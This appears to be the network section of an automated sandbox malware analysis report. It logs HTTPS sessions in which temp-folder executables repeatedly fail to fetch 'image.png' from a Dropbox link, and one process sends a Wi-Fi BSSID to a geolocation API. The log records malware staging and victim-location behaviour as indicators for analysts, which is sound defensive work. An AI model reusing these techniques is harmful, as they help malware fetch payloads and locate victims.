                                                                                                                                                                                                                                2024-07-06 11:28:29 UTC1082INData Raw: 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37 2e 34 33 32 39 34 39 33 36 20
                                                                                                                                                                                                                                Data Ascii: ath fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.43294936
                                                                                                                                                                                                                                2024-07-06 11:28:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                26192.168.2.449862162.125.66.154435184C:\Users\user\AppData\Local\Temp\jqnnpe.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:28:29 UTC83OUTGET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1
                                                                                                                                                                                                                                Host: dl.dropboxusercontent.com
                                                                                                                                                                                                                                2024-07-06 11:28:30 UTC441INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Security-Policy: sandbox allow-forms allow-scripts
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:29 GMT
                                                                                                                                                                                                                                Server: envoy
                                                                                                                                                                                                                                Content-Length: 925
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                X-Dropbox-Request-Id: 48d04f92f1ac43199464af56a5d91cbc
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-07-06 11:28:30 UTC925INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                27192.168.2.449863162.125.66.154435184C:\Users\user\AppData\Local\Temp\jqnnpe.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:28:29 UTC83OUTGET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1
                                                                                                                                                                                                                                Host: dl.dropboxusercontent.com
                                                                                                                                                                                                                                2024-07-06 11:28:30 UTC441INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Security-Policy: sandbox allow-forms allow-scripts
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:30 GMT
                                                                                                                                                                                                                                Server: envoy
                                                                                                                                                                                                                                Content-Length: 925
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                X-Dropbox-Request-Id: 46ad6b05262e4619b51ae914000086da
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-07-06 11:28:30 UTC925INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                28192.168.2.449865162.125.66.154435184C:\Users\user\AppData\Local\Temp\jqnnpe.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:28:31 UTC83OUTGET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1
                                                                                                                                                                                                                                Host: dl.dropboxusercontent.com
                                                                                                                                                                                                                                2024-07-06 11:28:31 UTC441INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Security-Policy: sandbox allow-forms allow-scripts
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:31 GMT
                                                                                                                                                                                                                                Server: envoy
                                                                                                                                                                                                                                Content-Length: 925
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                X-Dropbox-Request-Id: f43c932cfa484fca9fc7ff80a7acadfa
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-07-06 11:28:31 UTC925INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                29192.168.2.449866162.125.66.154435184C:\Users\user\AppData\Local\Temp\jqnnpe.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:28:31 UTC83OUTGET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1
                                                                                                                                                                                                                                Host: dl.dropboxusercontent.com
                                                                                                                                                                                                                                2024-07-06 11:28:31 UTC441INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Security-Policy: sandbox allow-forms allow-scripts
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:31 GMT
                                                                                                                                                                                                                                Server: envoy
                                                                                                                                                                                                                                Content-Length: 925
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                X-Dropbox-Request-Id: 4069f037958a44debf9ed35c1cac595e
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-07-06 11:28:31 UTC925INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                30192.168.2.449869162.125.66.154435184C:\Users\user\AppData\Local\Temp\jqnnpe.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:28:32 UTC83OUTGET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1
                                                                                                                                                                                                                                Host: dl.dropboxusercontent.com
                                                                                                                                                                                                                                2024-07-06 11:28:33 UTC441INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Security-Policy: sandbox allow-forms allow-scripts
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:32 GMT
                                                                                                                                                                                                                                Server: envoy
                                                                                                                                                                                                                                Content-Length: 925
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                X-Dropbox-Request-Id: 1e8c8e9e1b2e44389c706f2a5c52b53c
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-07-06 11:28:33 UTC925INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                31192.168.2.449872162.125.66.154435184C:\Users\user\AppData\Local\Temp\jqnnpe.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:28:34 UTC83OUTGET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1
                                                                                                                                                                                                                                Host: dl.dropboxusercontent.com
                                                                                                                                                                                                                                2024-07-06 11:28:34 UTC441INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Security-Policy: sandbox allow-forms allow-scripts
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:34 GMT
                                                                                                                                                                                                                                Server: envoy
                                                                                                                                                                                                                                Content-Length: 925
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                X-Dropbox-Request-Id: 67908c3c3d004af39cf20834f79e4f2b
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-07-06 11:28:34 UTC925INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                32192.168.2.449874162.125.66.154435184C:\Users\user\AppData\Local\Temp\jqnnpe.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:28:35 UTC107OUTGET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1
                                                                                                                                                                                                                                Host: dl.dropboxusercontent.com
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                2024-07-06 11:28:36 UTC441INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Security-Policy: sandbox allow-forms allow-scripts
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:35 GMT
                                                                                                                                                                                                                                Server: envoy
                                                                                                                                                                                                                                Content-Length: 925
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                X-Dropbox-Request-Id: cd1660047af542a6a6de914b17b29109
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-07-06 11:28:36 UTC925INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                33192.168.2.449876162.125.66.154435184C:\Users\user\AppData\Local\Temp\jqnnpe.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:28:37 UTC83OUTGET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1
                                                                                                                                                                                                                                Host: dl.dropboxusercontent.com
                                                                                                                                                                                                                                2024-07-06 11:28:37 UTC441INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Security-Policy: sandbox allow-forms allow-scripts
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:37 GMT
                                                                                                                                                                                                                                Server: envoy
                                                                                                                                                                                                                                Content-Length: 925
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                X-Dropbox-Request-Id: b9ae42e604aa4066aa9d8799a78b39ad
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-07-06 11:28:37 UTC925INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                34192.168.2.449880162.125.66.154435184C:\Users\user\AppData\Local\Temp\jqnnpe.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:28:38 UTC83OUTGET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1
                                                                                                                                                                                                                                Host: dl.dropboxusercontent.com
                                                                                                                                                                                                                                2024-07-06 11:28:39 UTC441INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Security-Policy: sandbox allow-forms allow-scripts
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:38 GMT
                                                                                                                                                                                                                                Server: envoy
                                                                                                                                                                                                                                Content-Length: 925
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                X-Dropbox-Request-Id: 963840405bcb441eb4550f06d4fd0515
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-07-06 11:28:39 UTC925INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                35192.168.2.449882172.67.196.1144435720C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:28:39 UTC112OUTGET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1
                                                                                                                                                                                                                                Host: api.mylnikov.org
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                2024-07-06 11:28:40 UTC781INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:40 GMT
                                                                                                                                                                                                                                Content-Type: application/json; charset=utf8
                                                                                                                                                                                                                                Content-Length: 88
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Cache-Control: max-age=2678400
                                                                                                                                                                                                                                CF-Cache-Status: MISS
                                                                                                                                                                                                                                Last-Modified: Sat, 06 Jul 2024 11:28:40 GMT
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9%2BC59zV1gESS1bAEHqBtOGvUf4SSCNkzn8GNOGPCRQmGtkXBJmdkzqSY1W1W0xGPJ3qZgkPICVoZisUqT5j4lG%2BYekIjvDyT67IqcOMj5ImWp9OSSvI1MMLEQze7B%2FLQOMk%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=0; preload
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef40a5afff41e7-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                2024-07-06 11:28:40 UTC88INData Raw: 7b 22 72 65 73 75 6c 74 22 3a 34 30 34 2c 20 22 64 61 74 61 22 3a 7b 7d 2c 20 22 6d 65 73 73 61 67 65 22 3a 36 2c 20 22 64 65 73 63 22 3a 22 4f 62 6a 65 63 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 22 2c 20 22 74 69 6d 65 22 3a 31 37 32 30 32 36 35 33 32 30 7d
                                                                                                                                                                                                                                Data Ascii: {"result":404, "data":{}, "message":6, "desc":"Object was not found", "time":1720265320}


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                36192.168.2.449885162.125.66.154435184C:\Users\user\AppData\Local\Temp\jqnnpe.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
